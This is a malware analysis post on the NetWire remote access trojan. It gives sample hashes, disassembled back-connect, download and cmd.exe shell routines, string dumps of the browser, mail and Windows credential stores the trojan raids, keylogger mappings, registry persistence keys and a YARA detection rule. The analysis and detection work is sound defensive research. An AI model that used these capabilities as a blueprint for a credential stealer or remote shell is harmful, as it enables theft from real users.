The background
There has been some talk internally in our group about a RAT (Remote Access Trojan) that is commonly found and used by crooks, called "NetWire RAT". The discussion was about why this RAT is so commonly found during carding, POS and similar hack cases related to cyber criminal activity, whether this RAT is multi-platform, and so on.
In short, I think it will be good to post here a thorough reference for my friends, fellow researchers and the industry to understand this threat (if not known yet) and to raise awareness among internet users of the existence of this malware (RAT family). This is a general write-up, and I will add more details later along with a more thorough check and investigation. Comments are welcome to add your view on this threat, enjoy!
The samples
Samples can be searched in VirusTotal with the hashes below:
07470d9b10cefa3a7dcb3a156f067203
9769cf1ab9fc54d1d7da644d94644273
1c1c848bbefe6d8353010619d50ef81f
1931bcb54655ca2018fec60bf84776f7
674d9a19d4e0c72c47738d7ae59c351c
45db57d2c15bf1f9dde1cbe8202323f3
64cf99ed2d02bb22eaad9e9699631424
628cf758e08575c475787e9caa2702eb
1e65e53427319e10ef3ee114caa2c638
The origin
Below is the origin of this threat; it started in 2012, with the complete explanation from its malware author. I made a long picture for it, so please be patient with the download. Here we go:
Installation and howto
A howto for this RAT, as explained by the author, is shown in the pictures below. Please click them one by one sequentially.
Specific characteristic
Some characteristics from a reversing point of view are explained in this section as a quick overview. Feel free to examine deeper. I used the sample with hash 1931bcb54655ca2018fec60bf84776f7, which I thought was the latest I could find; it is obviously the trial version of this RAT, as seen in the uploaded data below:
md5: 1931bcb54655ca2018fec60bf84776f7
directory: userprofile%\desktop\netwire-trial\
filename: doit.exe
Binary analysis in PEStudio
I'm a big fan and supporter of Marc's PEStudio; it detected this RAT pretty well. Below are the original indicators it spotted, to help you in analyzing this RAT:
Reversing & strings
Back connect
Back connect functionality can be seen in the function below, which uses HTTP/1.0:
; start addr 0x40391C
; callback functions in HTTP/1.0
push    ebp
mov     ebp, esp
push    edi
push    esi
push    ebx
sub     esp, 22Ch
mov     esi, [ebp+arg_0]
mov     eax, [ebp+arg_8]
mov     [esp+238h+var_228], eax
mov     eax, [ebp+arg_4]
mov     [esp+238h+var_22C], eax
mov     [esp+238h+var_230], offset aConnectSDHttp1 ; "CONNECT %s:%d HTTP/1.0\n\n"
mov     [esp+238h+var_234], 200h
lea     ebx, [ebp+var_218]
mov     [esp+238h+var_238], ebx
call    0x4094C7
mov     edi, eax
mov     [esp+238h+var_22C], 0
mov     [esp+238h+var_230], eax
mov     [esp+238h+var_234], ebx
mov     [esp+238h+var_238], esi
call    send
sub     esp, 10h
Download function
It uses HTTP/1.1 for the download function:
; in proc addr 0x4050F3
; download functions in HTTP/1.1
mov     eax, [ebp+arg_0]
lea     edx, [eax+204h]
mov     [esp+868h+var_858], edx
mov     [esp+868h+var_85C], eax
mov     [esp+868h+var_860], offset aGetSHttp1_1Hos ; "GET %s HTTP/1.1\r\nHost: %s \r\nConnection:"...
mov     [esp+868h+var_864], 800h
lea     ebx, [ebp+var_818]
mov     [esp+868h+var_868], ebx
call    0x4094C7
xor     eax, eax
or      ecx, 0xFFFFFFFFh
mov     edi, ebx
repne scasb
not     ecx
dec     ecx
mov     [esp+868h+var_85C], 0
mov     [esp+868h+var_860], ecx
mov     [esp+868h+var_864], ebx
mov     eax, [ebp+var_82C]
mov     [esp+868h+var_868], eax
call    send
sub     esp, 10h
mov     [esp+868h+var_864], offset aWb_0 ; "wb"
mov     eax, [ebp+arg_0]
add     eax, 408h
mov     [esp+868h+var_868], eax
call    fopen
mov     edi, eax
test    eax, eax
Shell
An attempt to gain access to the Windows OS shell (cmd.exe) is spotted after some checks of the environment are done, as per below:
; shell was gained in here (cmd.exe)
; after checking environment
; function in addr 0x4056A0
push    ebp
mov     ebp, esp
push    edi
push    esi
push    ebx
sub     esp, 2CCh
mov     [esp+2D8h+var_2D8], offset aComspec ; "ComSpec"
call    getenv
mov     [esp+2D8h+var_2CC], eax
mov     [esp+2D8h+var_2D0], offset aS_0 ; "%s"
mov     [esp+2D8h+var_2D4], 204h
lea     ebx, [ebp+var_21C]
mov     [esp+2D8h+var_2D8], ebx
call    0x4094C7
mov     [esp+2D8h+var_2D8], ebx
call    0x4047A1
test    al, al
jnz     short 0x40570E

; in addr 0x40570E
mov     [esp+2D8h+var_2D8], offset aWindir ; "WINDIR"
call    getenv
mov     [esp+2D8h+var_2CC], eax
mov     [esp+2D8h+var_2D0], offset aSSystem32Cmd_e ; "%s\\system32\\cmd.exe"
mov     [esp+2D8h+var_2D4], 204h
mov     [esp+2D8h+var_2D8], ebx
Credential Grabber
The string list below is enough to describe what this RAT is aiming for:
.data:0x40FA03 SOFTWARE\\Mozilla\\%s\\
.data:0x40FA18 CurrentVersion
.data:0x40FA27 SOFTWARE\\Mozilla\\%s\\%s\\Main
.data:0x40FA43 Install Directory
.data:0x40FA55 %s\\%s
.data:0x40FA5B mozutils.dll
.data:0x40FA68 mozglue.dll
.data:0x40FA74 mozsqlite3.dll
.data:0x40FA83 Mozilla Firefox
.data:0x40FA93 APPDATA
.data:0x40FA9C %s\\Mozilla\\Firefox\\profiles.ini
.data:0x40FABC %s\\Mozilla\\Firefox\\%s
.data:0x40FAD2 Mozilla Thunderbird
.data:0x40FAE6 %s\\Thunderbird\\profiles.ini
.data:0x40FB02 %s\\Thunderbird\\%s
.data:0x40FB14 SeaMonkey
.data:0x40FB20 %s\\Mozilla\\SeaMonkey\\profiles.ini
.data:0x40FB42 %s\\Mozilla\\SeaMonkey\\%s
.data:0x40FB5A %s\\signons.sqlite
.data:0x40FB6C NSS_Init
.data:0x40FB75 PK11_GetInternalKeySlot
.data:0x40FB8D PK11_Authenticate
.data:0x40FB9F NSSBase64_DecodeBuffer
.data:0x40FBB6 PK11SDR_Decrypt
.data:0x40FBC6 PK11_FreeSlot
.data:0x40FBD4 NSS_Shutdown
.data:0x40FBE1 sqlite3_open
.data:0x40FBEE sqlite3_close
.data:0x40FBFC sqlite3_prepare_v2
.data:0x40FC0F sqlite3_step
.data:0x40FC1C sqlite3_column_text
.data:0x40FC30 select *from moz_logins
.data:0x40FC4A %c%s\a%s\a%s\b\b\b\b
.data:0x40FC59 %s\\Opera\\Opera\\wand.dat
.data:0x40FC74 %s\\Opera\\Opera\\profile\\wand.dat
.data:0x40FC94 rb
.data:0x40FC97 \b\b\b\b
.data:0x40FC9C %s\\.purple\\accounts.xml
.data:0x40FCB4
.data:0x40FCBF %d%s\a
.data:0x40FCC5
.data:0x40FCCC
.data:0x40FCD7 %s\a
.data:0x40FCDB advapi32.dll
.data:0x40FCE8 CredEnumerateA
.data:0x40FCF7 CredFree
.data:0x40FD00 WindowsLive:name=*
.data:0x40FD16 %d%s\a%ws\a
.data:0x40FD20 Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
.data:0x40FD9B Email
.data:0x40FDA1 POP3 User
.data:0x40FDAB POP3 Server
.data:0x40FDB7 POP3 Password
.data:0x40FDC5 IMAP User
.data:0x40FDCF IMAP Server
.data:0x40FDDB IMAP Password
.data:0x40FDE9 HTTP User
.data:0x40FDF3 HTTP Server
.data:0x40FDFF HTTP Password
.data:0x40FE0D SMTP User
.data:0x40FE17 SMTP Server
.data:0x40FE23 SMTP Password
.data:0x40FE94 Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2
.data:0x40FEDE index.dat
.data:0x40FEE8 History
.data:0x40FEF0 Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders
.data:0x40FF34 %s\\Google\\Chrome\\User Data\\Default\\Login Data
.data:0x40FF64 %s\\Chromium\\User Data\\Default\\Login Data
.data:0x40FFAC localhost
.data:0x40FFB6 USERNAME
.data:0x40FFBF Unknown
.data:0x40FFC7 kernel32.dll
.data:0x40FFD4 GetNativeSystemInfo
.data:0x40FFE8 SYSTEM\\CurrentControlSet\\Control\\ProductOptions
.data:0x410018 ProductType
.data:0x410024 WINNT
.data:0x41002A LANMANNT
.data:0x410033 SERVERNT
.data:0x41003C %d
.data:0x41003F GlobalMemoryStatusEx
.data:0x410054 WINDIR
.data:0x41005B PATH
.data:0x410060 %s\a%s\a%s\a%I64u\a%I64u\a%I64u\a%s\a%s\a%s\a%s\a%d\a%s\a%d\a%s\a%d\a%s\a%d\a
Keystroke Mapping from remote operation
This one is also self-explanatory:
.data:0x41020C [Backspace]
.data:0x410218 [Enter]
.data:0x410220 [Tab]
.data:0x410226 [Arrow Left]
.data:0x410233 [Arrow Up]
.data:0x41023E [Arrow Right]
.data:0x41024C [Arrow Down]
.data:0x410259 [Home]
.data:0x410260 [Page Up]
.data:0x41026A [Page Down]
.data:0x410276 [End]
.data:0x41027C [Break]
.data:0x410284 [Delete]
.data:0x41028D [Insert]
.data:0x410296 [Print Screen]
.data:0x4102A5 [Scroll Lock]
.data:0x4102B3 [Caps Lock]
.data:0x4102BF [Alt]
.data:0x4102C5 [Esc]
.data:0x4102CB [Ctrl+%c]
Autostart
I almost forgot this one..
.data:0x4100A5 SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\
.data:0x4100D4 SOFTWARE\\Microsoft\\Active Setup\\Installed Components
.data:0x41010F SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\%s
.data:0x41014C StubPath
The %s value is like below:
{ND34H04A-G0C3-3VIE-0550-N18U87UEDA40}
There are many other functions too; please feel free to check them yourself, for practice :)
Signature and Prologue
To get a bit of an idea for mitigating and detecting this sample, I modified a sample filtration signature, which can be accessed -->[here], in Yara rule format. It is NOT an official Yara rule; I posted it here for example and research purposes. Some code was trimmed for the adjustment, and I may modify it later for better detection too.
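As an added illustration (this is not the rule linked above and not the author's signature), here is a Yara rule assembled only from strings shown in the back connect, shell, credential grabber, keystroke mapping and autostart sections of this post; thresholds, the size cap and the GUID value are assumptions to tune against your own sample set:

```yara
rule NetWire_RAT_trial_strings_example
{
    meta:
        description = "Added example built from strings quoted in the post; not the post's own rule"
        reference_md5 = "1931bcb54655ca2018fec60bf84776f7"

    strings:
        // back connect (HTTP/1.0 CONNECT) and download (HTTP/1.1 GET) format strings
        $net1 = "CONNECT %s:%d HTTP/1.0\x0a\x0a" ascii
        $net2 = "GET %s HTTP/1.1\x0d\x0aHost: %s \x0d\x0aConnection:" ascii

        // remote shell: ComSpec lookup, then %s\system32\cmd.exe fallback
        $shell1 = "ComSpec" ascii
        $shell2 = "%s\\system32\\cmd.exe" ascii

        // credential grabber targets (browsers, mail clients, Windows vault)
        $cred1 = "select *from moz_logins" ascii
        $cred2 = "%s\\signons.sqlite" ascii
        $cred3 = "%s\\Opera\\Opera\\wand.dat" ascii
        $cred4 = "WindowsLive:name=*" ascii
        $cred5 = "%s\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
        $cred6 = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2" ascii

        // keystroke mapping table used by the keylogger
        $key1 = "[Ctrl+%c]" ascii
        $key2 = "[Print Screen]" ascii
        $key3 = "[Scroll Lock]" ascii

        // persistence: Run key and Active Setup StubPath
        $run1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\" ascii
        $run2 = "SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\%s" ascii
        $run3 = "StubPath" ascii
        // GUID seen in this sample; assumed to vary per build, so it is optional
        $run4 = "{ND34H04A-G0C3-3VIE-0550-N18U87UEDA40}" ascii

        // host fingerprint record (fields separated by \a = 0x07)
        $fp = "%s\x07%s\x07%s\x07%I64u\x07%I64u\x07%I64u\x07" ascii

    condition:
        uint16(0) == 0x5A4D and filesize < 2MB and
        (
            $fp or $run4 or
            ( 1 of ($net*) and 1 of ($shell*) and 2 of ($cred*)
              and 1 of ($key*) and 2 of ($run*) )
        )
}
```

Generic strings such as "ComSpec" or "StubPath" are only meaningful in combination, which is why the condition requires hits from several capability groups unless the more specific fingerprint or GUID string is present.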
PS: It's good to be back :-)
Kudos to researcher friends who gave feedback, thank you!
@MalwareMustDie Thanks for sharing. Have you checked the commands, to see if they match the previous version analyzed? https://t.co/QhNHOxD7E9
— Alexandre Dulaunoy (@adulau) April 6, 2015
@MalwareMustDie the "New Profile" menu in NetWire Workstation lets you select "GNU/Linux". @rmsthebot would be proud!
— Dan Helton (@ch1kpee) April 6, 2015
@MalwareMustDie Very good finding! "Keystroke Mapping" detection will be added to the next #pestudio pic.twitter.com/u14fu59pwd
— Marc Ochsenmeier (@ochsenmeier) April 6, 2015
NetWire RAT gives HKCU Run key and ActiveX #persistence options. Nice find @MalwareMustDie! https://t.co/GtesYXFAW9 pic.twitter.com/bRzHMPd69w
— Huntress Labs (@HuntressLabs) January 20, 2016
#MalwareMustDie!